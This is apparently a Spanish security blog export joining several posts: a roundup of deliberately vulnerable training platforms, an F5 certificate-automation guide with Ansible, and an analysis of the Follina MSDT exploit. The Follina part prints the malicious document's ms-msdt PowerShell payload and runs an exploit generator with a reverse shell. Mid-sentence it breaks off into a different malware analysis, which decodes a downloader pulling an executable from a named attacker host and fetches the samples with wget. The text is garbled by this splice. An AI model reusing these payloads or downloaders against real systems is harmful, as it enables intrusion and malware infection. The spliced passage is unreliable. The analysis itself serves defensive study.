deben comprobar que sus redes y sistemas estén protegidos y fuera de brechas que los atacantes puedan aprovechar para acceder y tener datos comprometidos. Los hacker éticos , o personas que trabajen en los ya conocidos bugbounty en busca de recompensas por fallos de ciberseguridad, desempeñan un papel formidablemente valioso en la protección de los sistemas y las redes contra la vulnerabilidad de los actores y amenazas. el perfil de "Hacker" , representa en la actualidad, una de las profesiones más atractivas del panorama moderno y posiblemente, también una de las mejores remuneradas. Por ello, dado que los ciberdelincuentes continuamente hallan nuevas formas de ingresar a los sistemas y redes y desarrollan nuevas herramientas y técnicas, los hacker éticos, ya sea que sencillamente se este empezando en la ciberseguridad o trabajes como un hacker senior, se precisa continuamente practicar y mejorar las habilidades de hacking, de una forma mucho más intensa que en otros puestos. Existen muchas formas de aprender hacking ético y pruebas de penetración, ya sea por medio de tutoriales online, vídeos de YouTube (Intentare traeros un post), cursos, libros de ciberseguridad, podcasts, etc ... todos sabemos que nada supera un buen enfoque práctico. Para los hackers, puede ser bastante difícil probar las habilidades legalmente, por lo que tener sitios diseñados ( Hacker Simulator ) para ser vulnerados y administrar un ambiente seguro para probar las habilidades en hacking, es una genial forma de mejorar desafiándonos continuamente a nosotros mismos. Estos sitios, aplicaciones web ... que rebautizo como hacker simulator ( Como el juego 😆 ) , son frágiles por diseño ( de base ) y ofrecen un espacio para realizar hacking de una forma segura, siendo un terreno muy muy fértil para el auto-aprendizaje. Al ser empleados, podemos sentirnos cómodos al localizar vulnerabilidades, y mantener las habilidades en hacking limpias y actualizadas. Hoy os traemos una lista de hacker simulators , sitios y aplicaciones vulnerables de forma deliberada para pruebas de penetración y formación en hacking ético. Máquinas virtuales, plataformas web e incluso algunas orientadas al juego. ## Hack The Box [Imagen: Hacker Simulator - HacK The Box] Uno de los mejores Hacker Simulator, Hack The Box ha conquistado a la comunidad. Ahora cuenta con más de quinientos mil hacker, estudiantes, profesionales de la ciberseguridad y jugadores de todo el mundo. Una plataforma de pentesting online, Hack The Box (HTB) nos deja probar nuestras habilidades de ciberseguridad (y pentesting), así cómo intercambiar ideas y experiencias con una increíble comunidad. HTB contiene máquinas vulnerables de todos los niveles. Múltiples de sus retos se actualizan continuamente, algunos simulan escenarios del mundo real y otros se inclinan más cara los CTF. HTB también organiza CTF en su plataforma que son muy populares entre la comunidad de hackers, de la misma manera que los laboratorios dedicados libres , que pueden ser contratados para , por ejemplo, una universidad o un negocio. Actualmente, más de mil organizaciones ya usan esta función. Aunque HTB tiene solo unos pocos años, su multitud de opciones y su extensa comunidad establecen su situación como uno de los Hacker Simulator principales para la comunidad. ## bWAPP [Imagen: Hacker Simulator - bWAAP] Creado por Malik Messelem , bWAPP (abreviatura en ingles de "aplicación web con fallos") es posiblemente, dentro de los Hacker Simulator, una de las aplicaciones gratuitas y de código abierto más conocida, que, tal y como su nombre señala, esta creada de forma deliberada con vulnerabilidades. Es de los mejores, si no el mejor, con fallos deliberados para practicar y mejorar nuestras habilidades de hacking ético. Ya sea para un entusiasta de la ciberseguridad, un apasionado, un estudiante, un desarrollador o un profesional que sencillamente busca divertirse, este entorno, nos va a ayudar a efectuar y mejorar nuestras habilidades de hacking ético y pruebas de penetración en un entorno muy bueno. Lo que hace que bWAPP sea único, es que ofrece más de cien vulnerabilidades y fallos de aplicaciones web derivados del ya conocidísimos Proyecto Top diez de OWASP. Algunas de las vulnerabilidades son: - Cross-site scripting (XSS), rastreo entre sitios (XST) y falsificación de peticiones entre sitios (CSRF) - Ataques de Man in the Midle - Falsificación de petición del lado del servidor (SSRF) - Ataques DoS - Inyecciones de SQL, HTML, iFrame, SSI, OS Command, PHP, XML, XPath, LDAP, Host Header y SMTP y mucho más ... bWAPP está construido en PHP y emplea una base de datos MySQL. Se puede alojar tanto en el sistema operativo Windows como en Linux: en Windows, puede alojarse en el servidor xampp y wamp, en Linux, Apache, e igualmente es genial para utilizar en Kali Linux. Puedes descargarte bWAPP desde su web . ## HackThisSite .org [Imagen: Hacker Simulator - HackThisSite .org] Uno de los Hacker Simulator más elegidos por la comunidad de ciberseguridad, HackThisSite , o HTS, es un gran sitio de hacking, fundado por el conocido Jeremy Hammond y mantenido por la comunidad. Ofrece numerosos desafíos diferentes que contienen habilidades de hacking ético, tanto para principiantes como para profesionales de la ciberseguridad avanzados. Los desafíos son divertidos y atractivos, con escenarios de la vida real y diferentes personajes. Cada desafío tiene un hilo en un foro donde puede discutirlo con otros miembros de la comunidad y ofrecer recursos para resolver el rompecabezas más rápidamente. En uno de los desafíos, hasta tienes la oportunidad de hackear un sistema de votación. Algunos otros desafíos en HackThisSite son: - CTFs realistas - CTFs sobre aplicaciones - CTFs de telefonía - CTFs sobre análisis forense - CTFs de programación y código HackThisSite es un lugar agradable con una comunidad vibrante, donde, sin importar el nivel de habilidad, podrás encontrar una misión que te desafíe y te entretenga. ## CTFlearn [Imagen: Hacker Simulator - CTFLearn] CTFlearn es otra plataforma de hacking ético muy popular. CTF learn cuenta con más de 70 000 seguidores en todo el mundo que están allí para aprender, practicar y competir. El nombre de la plataforma deriva de Capture The Flag (CTF), que es popular en la comunidad de hackers por su contenido y reputación como un desafío de ciberseguridad ideal para autoretarse, independientemente del nivel en el que estemos. CTFlearn también presenta desafíos y competencias que brindan a los usuarios la capacidad de actuar como atacante y defensor, algo imprescindible para prepararnos correctamente ( y me apunto otro post pendiente sobre red/blue/orange/purple team ) Diferentes laboratorios involucran numerosos temas de ciberseguridad que los usuarios pueden crear ellos mismos. Los desafíos se agrupan en categorías y se organizan por nivel de dificultad. Creo que en CTFLearn , tenemos algo más de variedad que en HackThisSite. - CTFs Web - CTFs de Ingeniería inversa - CTFs sobre análisis forense - CTFs de programación y código - CTFs Binarios - CTFs sobre Criptografia - CTFs Misceláneos ## DVIA Un Hacker Simulator basado exclusivamente en una APP iOS. DVIA ( Damn Vulnerable iOS App ) es una aplicación móvil de iOS destinada a ayudar a los aficionados, profesionales y desarrolladores de ciberseguridad móvil a practicar sus pruebas de penetración. Recientemente se relanzó y está disponible de forma gratuita en GitHub. DVIA contiene vulnerabilidades comunes de aplicaciones de iOS siguiendo los 10 principales riesgos móviles de OWASP. Está escrito en Swift, con todas las vulnerabilidades probadas hasta iOS 11, y necesita tener instalado Xcode (la mejor manera de instalarlo es usando Cydia Impactor). Algunas de las vulnerabilidades con las que puedes jugar son: - Suplantación de identidad - Detección de jailbreak - Depuración/Debugging - Omisión de identificación táctil/cara - Fuga de datos del canal lateral - Criptografía - Seguridad de la capa de red - Aplicación de parches Aunque DVIA es de código abierto, si no puede resolver un desafío, puede comprar las soluciones y donar para apoyar el proyecto DVIA. Un Hacker Simulator bastante único y específico. ## Hellbound Hackers [Imagen: Hacker Simulator - Hellbound Hackers] Hellbound Hackers es una plataforma de ciberseguridad, que no solo ofrece desafíos prácticos, artículos, foros y una amplia gama de tutoriales de hacking, sino que también tiene una de las comunidades de hacking más grandes, con más de 100,000 miembros registrados. En Hellbound Hackers, tienes la oportunidad de participar con desafíos cronometrados que requieren que encuentres una vulnerabilidad y una forma de reparar la misma. Aprender cómo los actores maliciosos ingresan a los sistemas también nos enseñará cómo defendernos de ellos. Es ideal para principiantes, ya que ofrece algunos desafíos más simples que otras plataformas. NOTA: Antes de sumergirte en Hellbound Hackers, debe estar bastante familiarizado con HTML, JS y PHP. ## Google Gruyere [Imagen: Hacker Simulator - Google Gruyere] No es muy frecuente que veamos la combinación de queso y hacking, pero este sitio web se parece mucho al buen queso, lleno de agujeros. He de decir que utiliza código y diseño bastante "cursi" basado en el queso. Este Hacker Simulator de Google " Gruyere " es una excelente opción para los principiantes que desean sumergirse en la búsqueda y explotación de vulnerabilidades, pero también aprender a jugar en el otro lado y defenderse de las vulnerabilidades. Gruyere está escrito en Python, con errores que no son específicos de Python, y ofrece una cantidad sustancial de vulnerabilidades de seguridad elegidas para adaptarse a los principiantes. Algunas de las vulnerabilidades son: - Script entre sitios (XSS) - Falsificación de solicitud entre sitios (XRF) - Ejecución remota de código - Ataques DoS - Divulgación de información Gruyere codelab ha dividido las vulnerabilidades en diferentes secciones, y en cada sección tendrá la tarea de encontrar esa vulnerabilidad. Usando hacking de caja blanca y negra, deberás encontrar y explotar los distintos errores. > Es necesario algún conocimiento previos, pero diría que esta es la mejor opción para los principiantes. ## OWASP Mutillidae II Uno de los Hacker Simulator de OWASP a considerar , OWASP Mutillidae II , más conocido simplemente como Mutillidae. Escrita en PHP, esta es una aplicación web vulnerable de código abierto que se puede usar en Linux y Windows usando servidores lamp, wamp y xampp. Un punto importante es que viene preinstalado con Rapid7 Metasploitable 2, Samurai WTF y OWASP BWA para centrarnos en la busqueda. Para facilitar la instalación, ofrecen tutoriales para cada paso. Creo que se ha quedado algo estancada, llegando al top ten de OWASP de 2017, y tal vez necesitaría una pequeña actualización, pero claro esta, quien mejor que OWASP para enseñarnos las principales amenazas. ## OWASP WebGoat [Imagen: Hacker Simulator - OWASP WebGoat] Es el otro Hacker Simulator de OWASP, y una de las aplicaciones más usadas. WebGoat es una aplicación altamente insegura que proporciona un entorno de aprendizaje para a los fallos más comunes de las aplicaciones del lado del servidor. Está diseñado para ayudar a las personas a aprender sobre la ciberseguridad de las aplicaciones y practicar las habilidades de pentesting. Cada lección nos brinda la oportunidad de aprender sobre un determinado problema de ciberseguridad y explotarlo en la propia aplicación. WebGoat está disponible para múltiples entornos. Algunas de las vulnerabilidades y ataques explorados en WebGoat que he visto poco en otros Hacker Simulator son: - Envenenamiento de caché - inyección SQL - Ataques de troyanos - software espía - Codificación Unicode ## RootMe [Imagen: Hacker Simulator - RootMe] Un Hacker Simulator de capacitación en ciberseguridad multilingüe, RootMe es un excelente lugar para probar y mejorar nuestras habilidades de hacking ético. Cuenta con más de 300 pruebas que se actualizan periódicamente y más de 50 entornos virtuales, todo para proporcionar un entorno realista. RootMe también tiene una comunidad grande de más de 200 0000 miembros. Los diferentes temas cubiertos en Root Me incluyen: - CTFs sobre Investigación OSINT - Automatización - CTFs de rotura de cifrados - CTFs sobre Desafíos de la red - inyección SQL En este caso, el Hacker Simulator de RootMe, no es tan amigable para principiantes como algunas de las otras entradas del post, pero sin duda, se tiene que tener en cuenta. Entre las empresas que usan la plataforma , me alegra ver a 42 ;) ## OverTheWire [Imagen: Hacker Simulator - OverTheWire] Otro excelente lugar para divertirse y aprender, OverTheWire ofrece juegos de guerra y zonas de guerra para diferentes niveles de habilidad, aunque se inclina hacia conceptos de hacking más avanzados. Cada nivel presenta escenarios específicos, comienzas como "ladron" y te abres camino hasta hazañas más complejas. Primero serás desafiado por juegos de guerra que cubren conceptos y habilidades básicos, luego continuas a diferentes escenarios e historias más complicadas. OverTheWire también tiene un lado competitivo, la zona de guerra, una red aislada que simula el Internet IPv4. Todos los dispositivos conectados son objetivos para ser pirateados, lo que te colocará en competencia con otros hackers. ## Hacker Simulator [Imagen: Hacker Simulator] Todos las plataformas que hemos presentado en este posts son realmente "Simuladores de Hacker" , entornos hyperrealistas con multitud de escenarios de distintos niveles. Pero en realidad el nombre tal cual, hace referencia al nombre de un juego, que merece la pena ser incluido. Una obra realmente buena, que mezcla Hacking , con el Gaming y algo de frikismo y criptomonedas. Esta disponible para distintas plataformas, como Steam y PC , y sobre la que estoy segurísimo que os gustará. ## Disfruta aprendiendo No solo estas, si no que hay multitud de plataformas para poder poner a prueba nuestras habilidades de hacking ético. Poder conocer cómo atacar las vulnerabilidades, nos dará una gran ventaja a la hora de poder abordar las mismas. De cualquier forma y con la plataforma , juego o "Hacker Simulator" que prefiramos, siempre tener en cuenta, que el fundamento del aprendizaje, es que disfrutemos del camino, que disfrutemos aprendiendo. --- # Actualización dinámica de certificados en F5 URL: https://ciberseguridad.blog/actualizacion-dinamica-de-certificados-en-f5/ Tipo: Artículo Autor: AntonioManuel.DelToro Publicado: 2022-06-09 Actualizado: 2026-10-04 Tema: Laboratorios de ciberseguridad > Automatizamos la renovación de certificados en los balanceadores F5 con Ansible en Let’s Encrypt. Esta vez me ha tocado un poco de automatización 😊. Ha surgido la necesidad de poder actualizar los certificados de tráfico del F5 de forma dinámica en un proyecto , ya que no tienen mucho tiempo de vida. En este caso los certificados se los genera Let’s Encrypt. Por ello, he montado una pequeña POC que me gustaría compartiros donde monto un escenario y automatizo la renovación de dichos certificados para los balanceadores F5. En el post, no entro a mucho nivel de comandos ya que no es el objetivo de la PoC, pero si tenéis dudas no dudéis en escribirnos. En esta PoC vamos a mostrar como renovar certificados (o importarlos nuevos) en F5 de una forma totalmente automatizada. De esta forma no tendremos que estar pendiente de la caducidad de los certificados, sino que el automatismo lo hará por nosotros. ¿Qué requisitos son necesarios para montar este escenario? 1. Dispositivo F5 con Licencia (puede ser de Trial ya que es una PoC) 2. Cliente Linux 3. Ansible A modo simplista os muestro la arquitectura del escenario montado para la POC, a continuación se detallan a groso modo los diferentes pasos que se producen en el sistema: [Imagen: Proceso de automatización de certificados en F5 con Ansible] Puntos más importantes del proceso: 1. Petición a Let's Encrypt que nos genere un certificado para un dominio específico. 2. Nos responde y nos lanza un desafío (Una clave que comprobará por http o DNS). Esto es para comprobar que seamos propietario del dominio. 3. El dominio resolverá a una IP que tiene el F5, por lo que Let's Encrypt lanzará el desafío al F5, preguntando por una ruta específica. 4. Desde el equipo Unix, se cargará el desafío al F5 usando Ansible. También se creará una iRule para procesar el desafío HTTP y responder correctamente. 5. Una vez validado el desafío, Let's Encrypt envía el equipo Unix el certificado firmado correctamente. 6. Cuando el equipo Unix tiene posesión del certificado firmado, usando Ansible lo carga automáticamente al F5. Una vez hemos comentado muy por encima el funcionamiento del escenario vamos a comentar lo interesante, ¿Cómo montarlo? ## Configuración F5 para automatizar la renovación de certificados Como he comentado anteriormente, necesitamos un dispositivo F5 con licencia. En mi caso lo he virtualizado y he generado una licencia de pruebas (puede hacerse con cualquier cuenta, aquí ). [Imagen: Licencias F5] [Imagen: GNS3 F5] Realmente en el F5 la configuración inicial es mínima, asignarle una IP, crear un Virtual Server y asignarle la iRule que creamos: [Imagen: Creación Virtual Server F5] [Imagen: Creación de listener para virtual Server F5] En esta PoC es necesario que el dominio para el que se va a generar el certificado acabe resolviendo a la IP que tiene el F5. En este escenario solo se disponía de 1 IP pública, la del router de salida a INET, por lo que se ha usado un servicio de DNS dinámico (gratuito). El conocido NO-IP. [Imagen: Servicio NO-IP] Una vez tenemos esta asignación de DNS, realizamos una publicación en el router para que reenvíe el puerto 80 a 192.168.1.69:80 (el F5) [Imagen: Crear regla de router] Con estas configuraciones, ya tendríamos la parte inicial del F5 configuradas. ## Configuración Unix y Ansible para automatizar la renovación de certificados Para implementar esta configuración, nos hemos basado en los siguientes sitio de github: 1. Dehydrated bigip ansible 2. Dehydrated Realmente quien implementa toda la lógica en cuanto a certificado es dehydrated, que es una herramienta escrita en BASH que interactúa con Let's Encrypt usando el estándar ACME (Automatic Certificate Management Environment). Para dotar de automatismo a la hora de desplegar/renovar, han desarrollado unos Playbooks de ansible para hacer toda la integración en F5. Como comentaba anteriormente, hay varios tipos de desafíos. En esta PoC hemos usado HTTP. ### Instalación de dehydrated y ansible Podemos hacerlo fácilmente por paquetería: ``` dnf install epel-relase dnf install ansible dnf install dehydrated ``` Para testeo debemos usar el servicio de pruebas de Let's Encrypt, ``` vim /etc/dehydrated/config CA="letsencrypt-test" ``` Tenemos que definir para que dominio generamos el certificado: [Imagen: Definición de dominios para generar el certificado] Para configurar los playbooks de ansible, podemos visitar la WIKI del desarrollador ``` TEMPDIR=`mktemp -d` cd ${TEMPDIR} curl -o dehydrated-bigip-ansible-master.zip https://codeload.github.com/EquateTechnologies/dehydrated-bigip-ansible/zip/master unzip dehydrated-bigip-ansible-master.zip cp -Rv dehydrated-bigip-ansible-master/etc/dehydrated/ansible /etc/dehydrated/ansible cp -Rv dehydrated-bigip-ansible-master/etc/dehydrated/lib.d /etc/dehydrated/lib.d chmod 0600 /etc/dehydrated/ansible/bigip-inventory.ini chmod 0755 /etc/dehydrated/ansible/hooks/*.sh cd rm -rf ${TEMPDIR} ``` ### Definición de variables globales ``` vim /etc/dehydrated/conf.d/ansible.sh ANSIBLE_ARGS=${ANSIBLE_ARGS:-""} ANSIBLE_INVENTORY=${ANSIBLE_INVENTORY:-"/etc/dehydrated/ansible/bigip-inventory.ini"} ANSIBLE_PLAYBOOK_CLEAN_CHALLENGE=${ANSIBLE_PLAYBOOK_CLEAN_CHALLENGE:-"/etc/dehydrated/ansible/playbooks/bigip-clean_challenge.yml"} ANSIBLE_PLAYBOOK_DEPLOY_CERT_MANAGEMENT=${ANSIBLE_PLAYBOOK_DEPLOY_CERT_MANAGEMENT:-"/etc/dehydrated/ansible/playbooks/bigip-deploy_cert-management.yml"} ANSIBLE_PLAYBOOK_DEPLOY_CERT_TRAFFIC=${ANSIBLE_PLAYBOOK_DEPLOY_CERT_TRAFFIC:-"/etc/dehydrated/ansible/playbooks/bigip-deploy_cert-traffic.yml"} ANSIBLE_PLAYBOOK_DEPLOY_CHALLENGE=${ANSIBLE_PLAYBOOK_DEPLOY_CHALLENGE:-"/etc/dehydrated/ansible/playbooks/bigip-deploy_challenge.yml" ``` ``` vim /etc/dehydrated/conf.d/bigip.sh BIGIP_CLIENT_SSL_MANAGE=${BIGIP_CLIENT_SSL_MANAGE:-1} BIGIP_CLIENT_SSL_PARENT=${BIGIP_CLIENT_SSL_PARENT:-"/Common/clientssl"} BIGIP_DATA_GROUP_NAME=${BIGIP_DATA_GROUP_NAME:-"ACME_http-01"} BIGIP_ISSUER_CERT=${BIGIP_ISSUER_CERT:-"Lets-Encrypt-X3"} BIGIP_PARTITION=${BIGIP_PARTITION:-"Common"} BIGIP_SAVE_CONFIG=${BIGIP_SAVE_CONFIG:-1} BIGIP_SYNC_CONFIG=${BIGIP_SYNC_CONFIG:-0} BIGIP_SYNC_DEVICE_GROUP=${BIGIP_SYNC_DEVICE_GROUP:-"SYNC-FAILOVER-1"} ``` Inventario de Ansible: [Imagen: Inventario de Ansible] > NOTA: Tener en cuenta que usamos estas credenciales por defecto al tratarse de una PoC y que siempre deberán modificarse en un entorno productivo. Una vez configurado y con todos los scripts en sus ubicaciones, estamos en disposición ejecutar el automatismo. Antes que nada nos registramos: ``` dehydrated --register ``` Ejemplo de ejecución: ``` dehydrated --hook /etc/dehydrated/ansible/hooks/bigip-traffic-http-01.sh --accept-terms -c ``` [Imagen: dehydrated F5 Parte 1] [Imagen: dehydrated F5 Parte 2] Después de la ejecución, podemos comprobar como se han creado los certificados en el F5: [Imagen: Creación de certificado automático en F5] [Imagen: Propiedades Certificado creado en F5] Una vez realizado, este comando se dejará configurado como tarea planificada, para que se ejecute 1 vez al día. Si lo volvemos a lanzar, indica que no lo renueva ya que quedan más de 30 días. El tiempo mínimo para la renovación es configurable. En este caso, cuando queden menos de 30 días, volverá a generar un nuevo certificado de forma automática y lo actualizará en el F5. Es posible configurar un correo para que avise con notificaciones/resultados. [Imagen: Emision notificaciones de renovaciones certificados F5] NOTA: Con la siguiente opción podemos forzar la renovación, aunque falten más de X días: ``` dehydrated --hook /etc/dehydrated/ansible/hooks/bigip-traffic-http-01.sh --accept-terms -c --force ``` Espero que en algún momento os sea útil, ya que muchos clientes usan este tipo de certificados, evitando tener que estar pendientes de que no caduquen. Referencias usadas: - Dehydrated - Dehydrated Bigip Ansible - Letsencrypt Staging Environment - Community F5 --- # Analizando y explotando FOLLINA MSDT ( CVE-2022-30190 ) URL: https://ciberseguridad.blog/analizando-y-explotando-follina-msdt-cve-2022-30190/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2022-06-04 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Analizamos la reciente vulnerabilidad en MS Office al que le han asignado el CVE-2022-30190 y bautizado con el nombre de FOLLINA. Hola a tod@s! Recientemente a visto la luz una nueva vulnerabilidad al que le han asignado el CVE-2022-30190 y bautizado con el nombre de Follina por Kevin Beaumont, un conocido investigador de ciberseguridad. El grupo de investigadores neo_sec, encontró un fichero en Virus Total y fue entonces cuando se dieron cuenta de la vulnerabilidad y publicaron el siguiente tweet: [Imagen: Follina File MSDT CVE-2022-30190] En el mismo hilo dejaron la ruta de la ejecución del documento en la sandbox Any.run [Imagen: Sandbox Follina MSDT] El documento en cuestión es el siguiente. Al principio tuvo pocas detecciones, hoy día ya es más que detectado por los diferentes Antivirus, como vemos en la siguiente captura: [Imagen: Follina Virustotal Detección] Si os fijasteis en la captura del tweet, seguro que identificasteis rápidamente una cadena codificada en base64, me refiero a esta: [Imagen: Cadena Base64 Follina] En el mismo hilo, aparece lo que esconde: [Imagen: Ejecucción Follina] Que no es otra cosa que unos comandos Powershell para ejecutar de forma oculta una serie de acciones, podían verse en la captura de Any.run, pero lo que vamos a ver es cómo aprovecha la vulnerabilidad y qué se puede usar para reproducirla y/o modificarla. Primero, tratemos de identificar la URL dentro del fichero de VirusTotal a la que hace referencia el tweet. ``` $ dssuite zipdump.py 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784.doc Index Filename Encrypted Timestamp 1 [Content_Types].xml 0 2022-05-26 23:08:14 2 docProps/app.xml 0 2022-05-26 23:08:14 3 docProps/core.xml 0 2022-05-26 23:08:14 4 word/document.xml 0 2022-05-26 23:08:14 5 word/fontTable.xml 0 2022-05-26 23:08:14 6 word/settings.xml 0 2022-05-26 23:08:14 7 word/styles.xml 0 2022-05-26 23:08:14 8 word/webSettings.xml 0 2022-05-26 23:08:14 9 word/theme/theme1.xml 0 2022-05-26 23:08:14 10 word/_rels/document.xml.rels 0 2022-05-26 23:08:14 11 _rels/.rels 0 2022-05-26 23:08:14 ``` Tiene toda la pinta de encontrarse en word/_rels/document.xml.rels, así que ejecutamos lo mismo con el parámetro “-s 10 -d” para que nos lo muestre y utilizaremos la herramienta re-search.py para obtener la URL que buscamos. ``` $ dssuite zipdump.py 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784.doc -s 10 -d | dssuite re-search.py -u -n url -F officeurls https://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html! ``` Aquí la tenemos, terminada con una exclamación, y como lo que nos interesa es conocer su contenido, nos vamos a Any.run para verlo. [Imagen: Análisis estático Follina] En la zona donde están las URL podéis pulsar sobre la página y tendréis su contenido. Vamos a la parte interesante, parece que esas A, son parte de un padding para que esto funcione. ``` …. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\""; ``` Nos vamos a Cyberchef, copiamos y pegamos, añadimos “From Base64” y aquí tenemos lo que ya se había mencionado en el tweet. El contenido de la cadena. [Imagen: Cyberchef Follina Base64 Output] Parece ser que el documento utiliza la función de plantilla remota de Microsoft Word para recuperar un archivo HTML de un servidor web remoto, que a su vez utiliza el esquema URI ms-msdt MSProtocol para cargar código y ejecutar PowerShell, ahí es nada. Hay que decir, que la vulnerabilidad se parece a CVE-2021-40444 sólo que puedes ejecutar comandos Powershell y no hace falta descargar nada, puedes obtener lo que necesites directamente con ellos (con los comandos Powershell). Entonces, tenemos inyección de comandos de PowerShell accesibles a través del argumento IT_BrowseForFile de la aplicación msdt.exe. ¿Cómo podemos verlo funcionar en nuestro laboratorio? aquí tenemos una forma. El script que nos interesa es este. Y la forma de utilizarlo es la siguiente: ``` usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help show this help message and exit --command COMMAND, -c COMMAND command to run on the target (default: calc) --output OUTPUT, -o OUTPUT output maldoc file (default: ./follina.doc) --interface INTERFACE, -i INTERFACE network interface or IP address to host the HTTP server (default: eth0) --port PORT, -p PORT port to serve the HTTP server (default: 8000) --reverse REVERSE, -r REVERSE port to serve reverse shell on ``` Utilizaremos la opción de reverse shell. ``` $ python3 follina.py -i 192.168.56.1 -p 8000 -r 9001 [+] copied staging doc /tmp/1_4qtpa5 [+] created maldoc ./follina.doc [+] serving html payload on :8000 [+] starting 'nc -lvnp 9001' ``` El documento generado es follina.doc que será el que tengáis que usar. Pero ojo, si vuestra máquina de análisis en el Laboratorio no tiene salida a Internet no os funcionará, ¿por qué? ``` www$ cat index.html , podréis utilizar cualquier navegador con las opciones de debugging que traen incorporados, añadís “ De nuevo, tenemos ejecuciones de Powershell (lo que implicaría Debugger + Breakpoint CreateProcess[A|W] -> continuar -> esperar y ver el comando que va a ejecutar con Powershell) y una cadena ¿en base64? Sí IMPORTANTE: Recordar que el enlace se separa en el post para que no sea enlazable $ echo UAdAAtAEMAbwBuAFQAZQBOAHQAIAAtAFYAYQBMAHUAZQAgACgAbgBlAFcALQBPAEIASgBlAEMAdA AgAFMAeQBTAFQAZQBNAC4AbgBFAFQALgB3AGUAYgBjAEwASQBFAG4AVAApAC4AZABPAFcAbgBsAE 8AYQBkAGQAYQBUAGEAKAAgAB0gIABoAHQAdABwADoALwAvAGoAbwBzAGUAcABoAGkAbwBzAGUAcA BoAC4AYwBvAG0ALwB0AGkAbQBhAHkAYQAvAGQAcgBpAGwAbABzAC4AZQB4AGUAIAAdICAAKQAgAC 0ARQBOAGMATwBEAGkATgBnACAAYgB5AHQAZQAgAC0AUABhAHQAaAAgAB0gJABlAE4AVgA6AEEAcA BwAEQAQQBUAGEAXABkAHIAaQBsAGwALgBlAHgAZQAdICAAOwAgAFMAVABBAFIAVAAgAB0gJABlAG 4AdgA6AGEAUABwAEQAYQBUAGEAXABkAHIAaQBsAGwALgBlAHgAZQAdIA==" | base64 -d SEt-ConTeNt -VaLue (neW-OBJeCt SySTeM.nET.webcLIEnT).dOWnlOaddaTa( hXXp://josephioseph . com/timaya/drills.exe ) -ENcODiNg byte -Path $eNV:AppDATa\drill.exe ; START $env:aPpDaTa\drill.exe Y aparece el segundo malware, esta vez el exe final, que se guardara en %AppData% y se ejecutará. Casualmente, este servidor lista el contenido del directorio: [Imagen: Index Of Timaya] Y podemos descargar todo para analizarlo, por si se trata de muestras diferentes. $ curl -s http://josephioseph.com/timaya/ | awk -F"a href=\"" '{print $2}' | grep -v "Parent Directory" | grep -v ^$ | awk -F\" '{print $1}' | awk '{system("wget hXXp://josephioseph. com/timaya/"$1)} –….-- hXXp://josephioseph. com/timaya/drills.exe Resolviendo josephioseph.com (josephioseph .com)... 192.185.16.72 Conectando con josephioseph .com (josephioseph .com)``[192.185.16.72]:80... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 704512 (688K) [application/x-msdownload] Grabando a: “drills.exe” `drills.exe 100%[=====================>] 688,00K 245KB/s en 2,8s` …. (245 KB/s) - “drills.exe” guardado [704512/704512] `–….-- http://josephioseph.com/timaya/ecmk.exe` `Resolviendo josephioseph.com (josephioseph.com)... 192.185.16.72` `Conectando con josephioseph.com (josephioseph.com)[192.185.16.72]:80... conectado.` `Petición HTTP enviada, esperando respuesta... 200 OK` `Longitud: 1359360 (1,3M) [application/x-msdownload]` `Grabando a: “ecmk.exe”` ecmk.exe 100%[=====================>] 1,30M 395KB/s en 3,4s `…. (395 KB/s) - “ecmk.exe” guardado [1359360/1359360]` …… Y el resto del malware. ## Parte 4: El siguiente es: 9690051ee1cb4c8fd3462f0aaeb1ab54-warehouse.docx Un vistazo manual (con strings) en el documento podría ser útil pero, en este caso, no. No se ve nada relevante en un principio. Los docx son como los zip, si los renombras a zip y lo extraes, puedes ver una estructura, los xmls, etc. Utilizaremos zipdump.py. Las reglas Yara son muy útiles en muchos casos, este es uno de ellos (veamos algunos ejemplos): $ python zipdump.py -D 9690051ee1cb4c8fd3462f0aaeb1ab54-warehouse.docx | yara DDE_inOffice.yara MC_Office_DDE_Command_Execution DDE_inOffice.yara $ python zipdump.py -D "cb1c08fac545b7c589d4b23087b43430-SWIFT MESSAGE.docx" | yara DDE_inOffice.yara 